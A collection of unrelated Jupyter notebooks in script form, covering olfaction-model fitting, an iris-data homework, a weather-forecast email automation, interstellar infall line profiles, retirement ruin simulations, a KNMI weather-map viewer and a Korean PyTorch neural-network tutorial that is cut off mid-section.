results = np.zeros((21,n_splits,35)) #predictions_mean = {i:[None]*n_splits for i in range(21)} #predictions_stdev = {i:[None]*n_splits for i in range(21)} for col in range(21): X = X_all['dragon+all'] Y_mean = Y_all_mask['mean_std'][:,col] Y_stdev = Y_all_mask['mean_std'][:,col+21] for k,(train,test) in enumerate(shuffle_split): observed = Y_stdev[test] p_m = predictions_mean[col][k] p_s = predictions_stdev[col][k] for i,a in enumerate(np.linspace(0,1,35)): p_s_transformed = f_transformation(p_m, k0=f_coefs[col][0], k1=f_coefs[col][0]) predicted = a*p_s_transformed + (1-a)*p_s results[col,k,i] = np.corrcoef(predicted,observed)[1,0] plt.pcolormesh(np.linspace(0,1,35),np.arange(21),results.mean(axis=1))# - np.tile(results.mean(axis=1).max(axis=1),(35,1)).T) plt.xlabel('Weight given to transformation of the mean') plt.ylabel('Feature #') plt.colorbar() plt.figure() plt.plot(np.linspace(0,1,35),results.mean(axis=1).T-results.mean(axis=1)[:,0]) plt.xlabel('Weight given to transformation of the mean') for col in range(21): max_loc = np.argmax(results.mean(axis=1)[col,:]) print(col,np.linspace(0,1,35)[max_loc]) # + write = True # Set to True to actually generate the prediction files. n_estimators = 1000 # Set this to a high number (e.g. 1000) to get a good fit. # Best parameters, determined independently. max_features = {'int':{'mean':None,'sigma':None}, 'ple':{'mean':None,'sigma':None}, 'dec':{'mean':None,'sigma':None}} min_samples_leaf = {'int':{'mean':1,'sigma':4}, 'ple':{'mean':1,'sigma':1}, 'dec':{'mean':1,'sigma':1}} max_depth = {'int':{'mean':None,'sigma':2}, 'ple':{'mean':10,'sigma':10}, 'dec':{'mean':10,'sigma':10}} et = {'int':{'mean':True,'sigma':True}, 'ple':{'mean':False,'sigma':False}, 'dec':{'mean':False,'sigma':False}} #et['int'] = {'mean':False,'sigma':False} # Uncomment to get a correct score estimate, or leave commented to get best fit. 
use_mask = {'int':{'mean':False,'sigma':True}, 'ple':{'mean':False,'sigma':True}, 'dec':{'mean':False,'sigma':True}} # - for mdt in molecular_data_types: print(mdt) loading.make_prediction_files(rfcs_leaderboard[mdt],X_leaderboard_int[mdt],X_leaderboard_other[mdt], 'leaderboard_%s' % mdt,2,Y_test=Y_leaderboard_noimpute,write=False) rs_ = [[0.658,0.517,0.522,0.385,0.244,0.479],[0.665,0.509,0.535,0.372,0.238,0.487],[0.662,0.498,0.506,0.260,0.274,0.468], [0.650,0.532,0.535,0.330,0.272,0.492],[0.684,0.577,0.551,0.447,0.256,0.500],[0.655,0.551,0.535,0.269,0.311,0.486]] for i,challenge in enumerate(rs_): print(molecular_data_types[i]+'\t'.join(str(x) for x in challenge)) rfcs,score,rs = fit2.rfc_final(X_all,Y_all_imp['mean_std'],Y_all_mask['mean_std'], max_features,min_samples_leaf,max_depth,et,use_mask, n_estimators=n_estimators) loading.make_prediction_files(rfcs,X_testset_int,X_testset_other,'testset',2,write=False)
opc_python/gerkin/challenge1_collaborative.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: frontiers-env
#     language: python
#     name: frontiers-env
# ---

# Note: Parts of this homework might be quite challenging, as it may not be obvious how to even search for a possible solution. Feel free to collaborate with your classmates to solve these questions.

# **1**. Using `requests`, read text from
#
# `https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.names`
#
# and write a regular expression using `re` that returns the following list
#
# ```python
# ['sepal length in cm',
#  'sepal width in cm',
#  'petal length in cm',
#  'petal width in cm',
#  'class']
# ```

# **2**. Using `pandas`, create a DataFrame which looks like the image below (but with all rows) from
#
# `https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data`
#
# and the columns variable created in the last question.
#
# <img src="ex4_q2.png" alt="df" width="400"/>

# **3**. Modify the DataFrame so that `iris` is in a column called `genus`, `setosa` etc. is in a column named `species`, and remove the `class` column.

# **4**. Using `seaborn`, generate this plot from the DataFrame created in Q3.
#
# <img src="ex4_q4.png" alt="plot" width="400"/>

# **5**. Using `joypy`, create the following plot from the `iris` DataFrame from Q2. You may have to pip install `joypy` first.
#
# <img src="ex4_q5.png" alt="plot" width="400"/>
exercises/Exercises_04.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] papermill={} tags=[] # <img width="10%" alt="Naas" src="https://landen.imgix.net/jtci2pxwjczr/assets/5ice39g4.png?w=160"/> # + [markdown] papermill={} tags=[] # # OpenWeatherMap - Send daily email with predictions # <a href="https://app.naas.ai/user-redirect/naas/downloader?url=https://raw.githubusercontent.com/jupyter-naas/awesome-notebooks/master/OpenWeatherMap/OpenWeatherMap_Send_daily_email_with_predictions.ipynb" target="_parent"><img src="https://naasai-public.s3.eu-west-3.amazonaws.com/open_in_naas.svg"/></a> # + [markdown] papermill={} tags=[] # **Tags:** #openweathermap #weather #plotly #prediction #email #naas_drivers #automation #opendata #analytics #ai #image #html #text # + [markdown] papermill={} tags=[] # **Author:** [<NAME>](https://www.linkedin.com/in/gautier-vivard-1811b877/) # + [markdown] papermill={} tags=[] # ## Input # + [markdown] papermill={} tags=[] # ### Import libraries # + papermill={} tags=[] import requests import markdown2 import time import pandas as pd import naas from naas_drivers import plotly, prediction # + [markdown] papermill={} tags=[] # ### Setup your open weather info # + papermill={} tags=[] OPENWEATHER_KEY = '***************' # get your key from here https://home.openweathermap.org/api_keys (it takes couples of minutes) city = 'rouen' country_code = 'fr' # if you don't want to specify a country code, let '' # + papermill={} tags=[] # Output paths image and html output_image = f'{city}.png' output_html = f'{city}.html' # + [markdown] papermill={} tags=[] # ### Input email parameter # + papermill={} tags=[] email_to = ["<EMAIL>"] email_from = None subject = f'{city} predictions as of today' # + [markdown] papermill={} tags=[] # ### Schedule every day # + papermill={} tags=[] # 
naas.scheduler.add(cron='0 8 * * *') # naas.scheduler.delete() # + [markdown] papermill={} tags=[] # ### Create markdown template # + papermill={} tags=[] # %%writefile message.md Hey The *CITY* temperature on the last 5 days In +2 days, basic ML models predict the following temperature: - *linear*: LINEAR <img href=link_html target="_blank" src=link_image style="width:640px; height:360px;" /><br> [Open dynamic chart](link_html)<br> Have a nice day. <br> PS: You can [send the email again](link_webhook) if you need a fresh update.<br> <div><strong>Full Name</strong></div> <div>Open source lover | <a href="http://www.naas.ai/" target="_blank">Naas</a></div> # + [markdown] papermill={} tags=[] # ### Add email template as a dependency # + papermill={} tags=[] naas.dependency.add("message.md") # + [markdown] papermill={} tags=[] # ## Model # + [markdown] papermill={} tags=[] # ### Get the data from open weather map # + [markdown] papermill={} tags=[] # The historical open weather api need the latitude, longitude in order to have the data # + papermill={} tags=[] def get_geoloc(city: str, country_code: str = ''): """ Get the geoloc of a city, country :param city: name of the city :type city: str :param country_code: Please use ISO 3166 country codes, default to '' :type country_code: str """ url = f'http://api.openweathermap.org/geo/1.0/direct?q={city},,{country_code}&appid={OPENWEATHER_KEY}' return requests.get(url).json() def get_lat_lon(city: str, country_code: str = ''): """ Get the geoloc of a city, country :param city: name of the city :type city: str :param country_code: Please use ISO 3166 country codes, default to '' :type country_code: str """ geoloc = get_geoloc(city, country_code) if len(geoloc) == 0: return None, None return geoloc[0]['lat'], geoloc[0]['lon'] # get_lat_lon('paris') # get_lat_lon('paris', 'us') # + papermill={} tags=[] def get_historical_weather(city: str, country_code: str = '', nbr_days_before_now: int = 0): """Get historical weather data. 
For free API, maximum history is 5 days before now :param city: name of the city :type city: str :param country_code: Please use ISO 3166 country codes, default to '' :type country_code: str :param nbr_hours_before_now: number of hour before now """ unix_dt = int(time.time() - 60 * 60 * 24 * nbr_days_before_now) lat, lon = get_lat_lon(city, country_code) if lat is None: return None url = f'https://api.openweathermap.org/data/2.5/onecall/timemachine?lat={lat}&lon={lon}&dt={unix_dt}&appid={OPENWEATHER_KEY}&units=metric' return requests.get(url).json() def weather_data_to_df(city: str, country_code: str = '', nbr_days_before_now: int = 0) -> pd.DataFrame: data = get_historical_weather(city, country_code, nbr_days_before_now) df = pd.DataFrame(data['hourly']) df['date_time'] = pd.to_datetime(df['dt'], unit='s') df['city'] = city df['country_code'] = country_code df_explode_weather = pd.concat([df.drop(['weather', 'dt'], axis=1), df['weather'].str[0].apply(pd.Series)], axis=1) # df_explode_weather.set_index('date_time', inplace=True) return df_explode_weather # + papermill={} tags=[] df_histo_weather = pd.concat([weather_data_to_df(city, country_code, _) for _ in range(6)], ignore_index=True) df_histo_weather = df_histo_weather.sort_values(by='date_time').reset_index(drop=True).rename(columns={"date_time": "Date"}) df_histo_weather # + [markdown] papermill={} tags=[] # ### Add prediction column # + papermill={} tags=[] df_predict = prediction.get(dataset=df_histo_weather, date_column='Date', column="temp", data_points=5, prediction_type="all") df_predict # + [markdown] papermill={} tags=[] # ### Build chart # + papermill={} tags=[] chart = plotly.linechart(df_predict, x='Date', y=['temp', 'ARIMA', "LINEAR", "SVR", "COMPOUND"], showlegend=True, title=f'Temp in {city} last 5 days') # + [markdown] papermill={} tags=[] # ## Output # + [markdown] papermill={} tags=[] # ### Save as html and png # + papermill={} tags=[] chart.write_html(output_html) 
chart.write_image(output_image, width=1200)

# + [markdown] papermill={} tags=[]
# ### Expose chart

# + papermill={} tags=[]
link_image = naas.asset.add(output_image)
link_html = naas.asset.add(output_html, {'inline': True})

# + [markdown] papermill={} tags=[]
# ### Add webhook to run your notebook again

# + papermill={} tags=[]
link_webhook = naas.webhook.add()

# + [markdown] papermill={} tags=[]
# ### Create email content

# + papermill={} tags=[]
from datetime import datetime

# Values substituted into the markdown template below.
# DATANOW and LINEAR were previously referenced but never defined anywhere in
# this notebook, so building the email raised NameError at runtime.
# DATANOW: today's date (the template currently has no DATANOW token, so this
# substitution is a harmless no-op, but the variable must exist).
DATANOW = datetime.now().strftime("%Y-%m-%d")
# LINEAR: the latest linear-model temperature prediction. df_predict is built
# above by prediction.get(...) and charted with a 'LINEAR' column.
# NOTE(review): assumes the last row of df_predict is the furthest forecast
# ("+2 days" in the template) — confirm against prediction.get's output order.
LINEAR = round(float(df_predict["LINEAR"].iloc[-1]), 1)

markdown_file = "message.md"
# Context manager so the template file handle is closed deterministically
# (previously opened with a bare open(...).read()).
with open(markdown_file, "r") as f:
    content = f.read()
md = markdown2.markdown(content)
md

# Fill in the template placeholders with the computed values and asset links.
post = md.replace("DATANOW", str(DATANOW))
post = post.replace("CITY", str(city))
post = post.replace("LINEAR", str(LINEAR))
post = post.replace("link_image", str(link_image))
post = post.replace("link_html", str(link_html))
post = post.replace("link_webhook", str(link_webhook))
post

# + [markdown] papermill={} tags=[]
# ### Send email

# + papermill={} tags=[]
content = post
# Attach the chart image; `files` was previously undefined (NameError).
files = [output_image]
naas.notification.send(email_to=email_to, subject=subject, html=content,
                       files=files, email_from=email_from)
OpenWeatherMap/OpenWeatherMap_Send_daily_email_with_predictions.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# ## Introduction to the Interstellar Medium
# ### <NAME>
# ### Figures 9.5 and 9.6: two layer infall profiles

import numpy as np
import matplotlib.pyplot as plt
from astropy import units as u
from astropy import constants as c

# %matplotlib inline

# Speed of light in km/s, taken from astropy rather than hand-typed.
# (The original literal 2.9978e5 was slightly inaccurate: c = 2.99792458e5 km/s.)
C_KMS = c.c.to('km/s').value


# blackbody profile
# could also just call astropy but this is shorter...
def Bnu(nu, T):
    """Planck specific intensity B_nu(T).

    Parameters are astropy Quantities (frequency and temperature); the
    return value carries the corresponding intensity units.
    """
    return 2 * c.h * nu**3 / c.c**2 * (np.exp(c.h * nu / (c.k_B * T)) - 1)**-1


# the two-layer model
def Inu(nu0, v, v_in, sigma, T_b, tau_b, T_f, tau_f):
    """Emergent intensity from a two-layer (background + foreground) cloud.

    Parameters
    ----------
    nu0 : Quantity
        Rest frequency of the line.
    v : array
        Velocity grid (km/s).
    v_in : float
        Velocity of the foreground layer (km/s); positive = infall,
        negative = expansion.
    sigma : float
        Velocity dispersion of each layer (km/s).
    T_b, tau_b : Quantity, float
        Temperature and line-center optical depth of the background layer.
    T_f, tau_f : Quantity, float
        Temperature and line-center optical depth of the foreground layer.
    """
    nu = nu0 * (1 - v / C_KMS)  # Doppler-shifted frequency
    # Gaussian optical-depth profiles: background centered at v = 0,
    # foreground centered at the infall velocity v_in.
    tau_nub = tau_b / np.exp(v**2 / (2 * sigma**2))
    tau_nuf = tau_f / np.exp((v - v_in)**2 / (2 * sigma**2))
    # Background emission attenuated by the foreground, plus the
    # foreground's own emission.
    return (Bnu(nu, T_b) * (1 - np.exp(-tau_nub)) * np.exp(-tau_nuf)
            + Bnu(nu, T_f) * (1 - np.exp(-tau_nuf)))


def plot_profile1():
    """Figure 9.5: infall profiles for several foreground optical depths."""
    sigma = 0.3                              # turbulent broadening (km/s)
    vmax = 1.6
    dv = 0.025
    v = np.arange(-vmax, vmax + dv, dv)      # velocity grid (km/s)

    T_f = 5 * u.K                            # foreground temperature
    T_b = 20 * u.K                           # background temperature
    tau_b = 2                                # background optical depth
    v_in = 0.1                               # infall velocity (km/s)

    # aperture
    r = 10                                   # beam FWHM (arcsec)
    Omega = 2 * np.pi * (r / 2.355)**2 * 2.35e-11   # beam solid angle (sr)

    #nu0 = 345.796e9 * u.Hz                  # CO 3-2
    #nu0 = 115.271e9 * u.Hz                  # CO 1-0
    nu0 = 97.981e9 * u.Hz                    # CS 2-1

    fig = plt.figure(figsize=(6, 4))
    ax = fig.add_subplot(111)
    ax.set_xlim(-1.75, 1.75)
    ax.set_ylim(-1.0, 12)
    ax.set_xlabel(r'${\rm Velocity}\ {\rm (km/s)}$', fontsize=14)
    ax.set_ylabel(r'$F_\nu\ {\rm (Jy)}$', fontsize=14)

    # One curve per foreground optical depth; heavier/darker = more opaque.
    for tau_f0, lw, alpha, label in [(0.1, 2.0, 0.2, '0.1'),
                                     (0.5, 2.3, 0.4, '0.5'),
                                     (2.0, 2.6, 1.0, '2.0')]:
        Fnu = Inu(nu0, v, v_in, sigma, T_b, tau_b, T_f, tau_f0) * Omega * 1e26  # Jy
        ax.plot(v, Fnu, color='black', lw=lw, ls='-', alpha=alpha, label=label)

    ax.legend(loc=1, title=r'$\tau_{\rm f0}$')
    ax.text(0.05, 0.87, r'$v_{\rm in} = 0.1\,{\rm km/s}$', fontsize=12,
            transform=ax.transAxes)
    fig.tight_layout(rect=[0.0, 0.0, 1.0, 1.0])
    plt.savefig('infall1.pdf')


def plot_profile2():
    """Figure 9.6: collapsing (v_in > 0) vs expanding (v_in < 0) profiles."""
    sigma = 0.3                              # turbulent broadening (km/s)
    vmax = 1.6
    dv = 0.025
    v = np.arange(-vmax, vmax + dv, dv)      # velocity grid (km/s)

    T_f = 5 * u.K                            # foreground temperature
    T_b = 20 * u.K                           # background temperature
    tau_f = 1.5                              # foreground optical depth
    tau_b = 2                                # background optical depth

    # aperture
    r = 10                                   # beam FWHM (arcsec)
    Omega = 2 * np.pi * (r / 2.355)**2 * 2.35e-11   # beam solid angle (sr)
    nu0 = 97.981e9 * u.Hz                    # CS 2-1

    fig = plt.figure(figsize=(8, 5))
    # Left panel: collapsing cloud; right panel: expanding cloud.
    panels = [('Collapsing', [0.0, 0.1, 0.2]),
              ('Expanding', [0.0, -0.1, -0.2])]
    for ipanel, (title, v_ins) in enumerate(panels):
        ax = fig.add_subplot(1, 2, ipanel + 1)
        ax.set_xlim(-1.75, 1.75)
        ax.set_ylim(-0.5, 8.0)
        ax.set_xlabel(r'${\rm Velocity}\ {\rm (km/s)}$', fontsize=14)
        if ipanel == 0:
            ax.set_ylabel(r'$F_\nu\ {\rm (Jy)}$', fontsize=14)
        else:
            # Right panel shares the left panel's y scale; hide its labels.
            ax.set_yticklabels([])
        # Fainter curves for larger |v_in|, matching the original styling.
        for v_in, alpha in zip(v_ins, (1.0, 0.4, 0.2)):
            Fnu = Inu(nu0, v, v_in, sigma, T_b, tau_b, T_f, tau_f) * Omega * 1e26
            ax.plot(v, Fnu, color='black', lw=2, ls='-', alpha=alpha,
                    label='%g' % v_in)
        ax.legend(loc=1, title=r'$v_{\rm in}$')
        ax.text(0.06, 0.92, title, fontsize=13, transform=ax.transAxes)
        # Annotation derived from the tau_f variable above; the original text
        # hard-coded "tau_f0 = 1" while the code actually used tau_f = 1.5.
        ax.text(0.06, 0.87, r'$\tau_{\rm f0} = %g$' % tau_f, fontsize=11,
                transform=ax.transAxes)
    fig.tight_layout(rect=[0.0, 0.0, 1.0, 1.0])
    plt.savefig('infall2.pdf')


# Figure 9.5
plot_profile1()

# Figure 9.6
plot_profile2()
star_formation/infall.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + # %matplotlib inline from pprint import pprint from matplotlib import pyplot as plt import itertools import pandas import seaborn import numpy import market import simulate import harvesting import withdrawal import metrics import montecarlo import mortality # - seaborn.set(style="whitegrid") seaborn.set_context('poster') Market = market.Returns_US_1871() def get_rq(stock_pct, age, withdrawal_pct): # I can't figure out how to to joint life expectancy so I'll # just use female life expectancy for now :/ life_expectancy = mortality.life_expectancy(None, age) mean = montecarlo.simba_mean[stock_pct] stddev = montecarlo.simba_stddev[stock_pct] return metrics.probability_of_ruin(mean, stddev, life_expectancy, float(withdrawal_pct)) df = pandas.DataFrame(index=numpy.arange(1,26)) for year in range(1871, 2019 - 30 + 1): s = simulate.withdrawals(Market.iter_from(year), years=25, harvesting=harvesting.N_60_RebalanceHarvesting, withdraw=withdrawal.ConstantDollar) r_series = [] for (i, age) in zip(s, itertools.count(start=65)): r = get_rq(60, age, i.withdraw_n/i.portfolio_pre.value_n) r_series.append(r) df[year] = r_series df.head() plt.figure(figsize=(11,9)) df.max().plot() plt.figure(figsize=(11,9)) df[1960].plot()
Sleep Well At Night Redux.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 2 # language: python # name: python2 # --- # # Interactively rendering weather maps from the KNMI database # *<NAME>, March 2016* # # In the process of analysing any kind of meteorological data, it is important to comprehend the synoptic situation, *the bigger picture*. Therefore, I often visit the KNMI database to view weathermaps, but to get to the desired map requires an unpleasant and time consuming amount of mouse clicks. Therefore, I developed a small script that is able to automatically find the correct weather map given a date and time, and to visualize it immediately in the Jupyter notebook. # # ##### Note! # *Unfortunately, the widgets are not visible when the notebook is viewed outside ipython. As far as I know, this is currently not possible. If anyone knows how to do it, please let me know.* # ## Accessing and displaying the weather maps # Every weather map is stored in the KNMI database with a standard format, e.g.: # http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_2012052812.gif. # There are several ways to load such a figure in the notebook, the most simple solution is # # # # # + # Required package from IPython.display import Image weblink = 'http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_2012052812.gif' Image(url=weblink) # - # That's a good start. The next step is to automatically generate the correct url, given any date and time. 
# + # Required package from datetime import datetime, timedelta def find_weathermap(timestamp): ''' Given a datetime object, find the url corresponding to the closest operation analysis map on the KNMI database''' # First, find the time corresponding to the nearest operational analysis nearest_6hour = round((timestamp.hour+timestamp.minute/60.)/6)*6 # yields either 0, 6, 12, 18 or 24(!) nearest_analysis = datetime(timestamp.year,timestamp.month,timestamp.day) + timedelta(hours=nearest_6hour) print 'The nearest operational analysis time is',nearest_analysis # Then, convert the datetime object to a string timestring = nearest_analysis.strftime('%Y%m%d%H') print 'As a string, this looks like', timestring # Finally, embed the string in the url url = 'http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_'+timestring+'.gif' print 'The corresponding map:',url return url # Demonstration x = datetime.now() weblink = find_weathermap(x) # - # This result can be plotted, but only if the current 'nearest weather map' is already there. # ## Adding interactivity # This demonstrates how weathermaps can be viewed interactively with the help of widgets. First, I will let the user choose some dates. Then, I will use a slider to visualize weather maps in a 'loop'. # + # Required package from IPython.display import Image, display from IPython.html.widgets import interact,fixed from datetime import datetime, timedelta # We use the function as above, but without the print statements def find_weathermap(timestamp): ''' Given a datetime object, find the url corresponding to the closest operation analysis map on the KNMI database''' # First, find the time corresponding to the nearest operational analysis nearest_6hour = round((timestamp.hour+timestamp.minute/60.)/6)*6 # yields either 0, 6, 12, 18 or 24(!) 
nearest_analysis = datetime(timestamp.year,timestamp.month,timestamp.day) + timedelta(hours=nearest_6hour) # Then, convert the datetime object to a string timestring = nearest_analysis.strftime('%Y%m%d%H') # Finally, embed the string in the url url = 'http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_'+timestring+'.gif' return url # Then, a function to show the weather maps interactively: def view_map(year=2010,month=1,day=1,hour=0,minute=0): ''' View weather maps from KNMI database for a given date and time ''' # First the input needs to be converted to a datetime object hour = int(hour) # because I will use a float text box below timestamp = datetime(year,month,day,hour,minute) # Then, find the corresponding url weblink = find_weathermap(timestamp) # Finally, visualise the map a = Image(url=weblink) # somehow, using Image() directly display(a) # does not work inside a function return interact(view_map, year = ({'2010':2010,'2011':2011,'2012':2012}), month = ({'January':1,'February':2,'March':3,'April':4}), day = (0,31), hour = ('0'), minute = fixed(0)) # - # This script is not fool-proof yet. For example, it will give errors for 31st of February. Also, I have not included all months in the dropdown menu, etc. This is just intended as a matter of demonstration. In most cases, the datetime object will be part of my (time series) data, and interaction won't be necessary. This is just to check that it works. 
# The best tutorial for widgets that I could find: # http://nbviewer.jupyter.org/github/quantopian/ipython/blob/master/examples/Interactive%20Widgets/Using%20Interact.ipynb # + # To embed the weather map in a matplotlib subplot: import io from PIL import Image from urllib2 import urlopen url = 'http://cdn.knmi.nl/knmi/map/page/klimatologie/daggegevens/weerkaarten/analyse_2012031700.gif' image_bytes = urlopen(url).read() # internal data file data_stream = io.BytesIO(image_bytes) # open as a PIL image object pil_image = Image.open(data_stream) import matplotlib.pyplot as plt # %matplotlib inline f,ax = plt.subplots(1,2,figsize=(16,8)) ax[1].imshow(pil_image)
wheather_maps.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # %matplotlib inline # # 신경망(Neural Networks) # ======================= # # 신경망은 ``torch.nn`` 패키지를 사용하여 생성할 수 있습니다. # # 지금까지 ``autograd`` 를 살펴봤는데요, ``nn`` 은 모델을 정의하고 미분하는데 # ``autograd`` 를 사용합니다. # ``nn.Module`` 은 계층(layer)과 ``output`` 을 반환하는 ``forward(input)`` # 메서드를 포함하고 있습니다. # # 숫자 이미지를 분류하는 신경망을 예제로 살펴보겠습니다: # # .. figure:: /_static/img/mnist.png # :alt: convnet # # convnet # # 이는 간단한 순전파 네트워크(Feed-forward network)입니다. 입력(input)을 받아 # 여러 계층에 차례로 전달한 후, 최종 출력(output)을 제공합니다. # # 신경망의 일반적인 학습 과정은 다음과 같습니다: # # - 학습 가능한 매개변수(또는 가중치(weight))를 갖는 신경망을 정의합니다. # - 데이터셋(dataset) 입력을 반복합니다. # - 입력을 신경망에서 전파(process)합니다. # - 손실(loss; 출력이 정답으로부터 얼마나 떨어져있는지)을 계산합니다. # - 변화도(gradient)를 신경망의 매개변수들에 역으로 전파합니다. # - 신경망의 가중치를 갱신합니다. 일반적으로 다음과 같은 간단한 규칙을 사용합니다: # ``가중치(wiehgt) = 가중치(weight) - 학습율(learning rate) * 변화도(gradient)`` # # 신경망 정의하기 # ------------------ # # 이제 신경망을 정의해보겠습니다: # # # + import torch import torch.nn as nn import torch.nn.functional as F class Net(nn.Module): def __init__(self): super(Net, self).__init__() # 1 input image channel, 6 output channels, 3x3 square convolution # kernel self.conv1 = nn.Conv2d(1, 6, 3) self.conv2 = nn.Conv2d(6, 16, 3) # an affine operation: y = Wx + b self.fc1 = nn.Linear(16 * 6 * 6, 120) # 6*6 from image dimension self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) def forward(self, x): # Max pooling over a (2, 2) window x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2)) # If the size is a square you can only specify a single number x = F.max_pool2d(F.relu(self.conv2(x)), 2) x = x.view(-1, self.num_flat_features(x)) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = self.fc3(x) return x def num_flat_features(self, x): size = x.size()[1:] # all dimensions except the batch dimension num_features = 1 for s in 
size: num_features *= s return num_features net = Net() print(net) # - # ``forward`` 함수만 정의하고 나면, (변화도를 계산하는) ``backward`` 함수는 # ``autograd`` 를 사용하여 자동으로 정의됩니다. # ``forward`` 함수에서는 어떠한 Tensor 연산을 사용해도 됩니다. # # 모델의 학습 가능한 매개변수들은 ``net.parameters()`` 에 의해 반환됩니다. # # params = list(net.parameters()) print(len(params)) print(params[0].size()) # conv1's .weight # 임의의 32x32 입력값을 넣어보겠습니다. # # Note: 이 신경망(LeNet)의 예상되는 입력 크기는 32x32입니다. 이 신경망에 MNIST # 데이터셋을 사용하기 위해서는, 데이터셋의 이미지 크기를 32x32로 변경해야 합니다. # # input = torch.randn(1, 1, 32, 32) out = net(input) print(out) # 모든 매개변수의 변화도 버퍼(gradient buffer)를 0으로 설정하고, 무작위 값으로 # 역전파를 합니다: # # net.zero_grad() out.backward(torch.randn(1, 10)) # <div class="alert alert-info"><h4>Note</h4><p>``torch.nn`` 은 미니-배치(mini-batch)만 지원합니다. ``torch.nn`` 패키지 # 전체는 하나의 샘플이 아닌, 샘플들의 미니-배치만을 입력으로 받습니다. # # 예를 들어, ``nnConv2D`` 는 ``nSamples x nChannels x Height x Width`` 의 # 4차원 Tensor를 입력으로 합니다. # # 만약 하나의 샘플만 있다면, ``input.unsqueeze(0)`` 을 사용해서 가짜 차원을 # 추가합니다.</p></div> # # 계속 진행하기 전에, 지금까지 살펴봤던 것들을 다시 한번 요약해보겠습니다. # # **요약:** # - ``torch.Tensor`` - ``backward()`` 같은 autograd 연산을 지원하는 # *다차원 배열* 입니다. 또한 tensor에 대한 *변화도(gradient)를 갖고* 있습니다. # - ``nn.Module`` - 신경망 모듈. *매개변수를 캡슐화(encapsulation)하는 간편한 # 방법* 으로, GPU로 이동, 내보내기(exporting), 불러오기(loading) 등의 작업을 # 위한 헬퍼(helper)를 제공합니다. # - ``nn.Parameter`` - Tensor의 한 종류로, ``Module`` *에 속성으로 할당될 때 # 자동으로 매개변수로 등록* 됩니다. # - ``autograd.Function`` - *autograd 연산의 전방향과 역방향 정의* 를 구현합니다. # 모든 ``Tensor`` 연산은 하나 이상의 ``Function`` 노드를 생성하며, 각 노드는 # ``Tensor`` 를 생성하고 *이력(history)을 부호화* 하는 함수들과 연결하고 있습니다. # # **지금까지 우리가 다룬 내용은 다음과 같습니다:** # - 신경망을 정의하는 것 # - 입력을 처리하고 ``backward`` 를 호출하는 것 # # **더 살펴볼 내용들은 다음과 같습니다:** # - 손실을 계산하는 것 # - 신경망의 가중치를 갱신하는 것 # # 손실 함수 (Loss Function) # ------------------------- # 손실 함수는 (output, target)을 한 쌍(pair)의 입력으로 받아, 출력(output)이 # 정답(target)으로부터 얼마나 멀리 떨어져있는지 추정하는 값을 계산합니다. # # nn 패키지에는 여러가지의 `손실 함수들 <http://pytorch.org/docs/nn.html#loss-functions>`_ # 이 존재합니다. 
# 간단한 손실 함수로는 출력과 대상간의 평균제곱오차(mean-squared error)를 계산하는 # ``nn.MSEloss`` 가 있습니다. # # 예를 들면: # # # + output = net(input) target = torch.randn(10) # a dummy target, for example target = target.view(1, -1) # make it the same shape as output criterion = nn.MSELoss() loss = criterion(output, target) print(loss) # - # 이제 ``.grad_fn`` 속성을 사용하여 ``loss`` 를 역방향에서 따라가다보면, # 이러한 모습의 연산 그래프를 볼 수 있습니다: # # :: # # input -> conv2d -> relu -> maxpool2d -> conv2d -> relu -> maxpool2d # -> view -> linear -> relu -> linear -> relu -> linear # -> MSELoss # -> loss # # 따라서 ``loss.backward()`` 를 실행할 때, 전체 그래프는 손실(loss)에 대하여 # 미분되며, 그래프 내의 ``requires_grad=True`` 인 모든 Tensor는 변화도(gradient)가 # 누적된 ``.grad`` Tensor를 갖게 됩니다. # # 설명을 위해, 역전파의 몇 단계를 따라가보겠습니다: # # print(loss.grad_fn) # MSELoss print(loss.grad_fn.next_functions[0][0]) # Linear print(loss.grad_fn.next_functions[0][0].next_functions[0][0]) # ReLU # 역전파(Backprop) # ---------------- # 오차(error)를 역전파하기 위해서는 ``loss.backward()`` 만 해주면 됩니다. # 기존 변화도를 없애는 작업이 필요한데, 그렇지 않으면 변화도가 기존의 것에 # 누적되기 때문입니다. # # # 이제 ``loss.backward()`` 를 호출하여 역전파 전과 후에 conv1의 bias gradient를 # 살펴보겠습니다. # # # + net.zero_grad() # zeroes the gradient buffers of all parameters print('conv1.bias.grad before backward') print(net.conv1.bias.grad) loss.backward() print('conv1.bias.grad after backward') print(net.conv1.bias.grad) # - # 지금까지 손실 함수를 어떻게 사용하는지를 살펴봤습니다. # # **더 읽어보기:** # # 신경망 패키지(nn package)에는 심층 신경망(deep neural network)을 구성하는 # 다양한 모듈과 손실 함수가 포함되어 있습니다. # 전체 목록은 `이 문서 <http://pytorch.org/docs/nn>`_ 에 있습니다. # # **이제 더 살펴볼 내용은 다음과 같습니다:** # # - 신경망의 가중치를 갱신하는 것 # # 가중치 갱신 # ------------------ # 실제로 많이 사용되는 가장 단순한 갱신 규칙은 확률적 경사하강법(SGD; Stochastic # Gradient Descent)입니다: # # 